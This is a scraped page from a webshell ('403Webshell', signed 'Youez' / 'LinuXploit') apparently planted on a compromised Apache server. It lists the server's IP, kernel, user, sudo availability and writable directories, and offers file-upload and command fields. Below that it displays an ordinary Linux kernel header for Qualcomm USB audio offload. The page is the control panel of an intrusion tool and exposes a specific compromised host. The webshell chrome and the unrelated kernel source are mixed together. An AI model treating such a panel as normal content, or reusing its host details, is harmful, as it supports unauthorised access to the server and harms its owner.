403Webshell
Server IP : 35.154.56.2  /  Your IP : 216.73.217.116
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux ip-172-31-0-189 6.8.0-1029-aws #31-Ubuntu SMP Wed Apr 23 18:20:04 UTC 2025 aarch64
User : ubuntu ( 1000)
PHP Version : 8.3.6
Disable Function : NONE
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /usr/src/linux-headers-7.0.0-1010-aws/include/sound/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/src/linux-headers-7.0.0-1010-aws/include/sound/q6usboffload.h
/* SPDX-License-Identifier: GPL-2.0
 *
 * sound/q6usboffload.h -- QDSP6 USB offload
 *
 * Copyright (c) 2022-2025 Qualcomm Innovation Center, Inc. All rights reserved.
 */

/**
 * struct q6usb_offload - USB backend DAI link offload parameters
 * @dev: dev handle to usb be
 * @domain: allocated iommu domain
 * @intr_num: usb interrupter number
 * @sid: streamID for iommu
 **/
struct q6usb_offload {
	struct device *dev;
	struct iommu_domain *domain;
	u16 intr_num;
	u8 sid;
};

Youez - 2016 - github.com/yon3zu
LinuXploit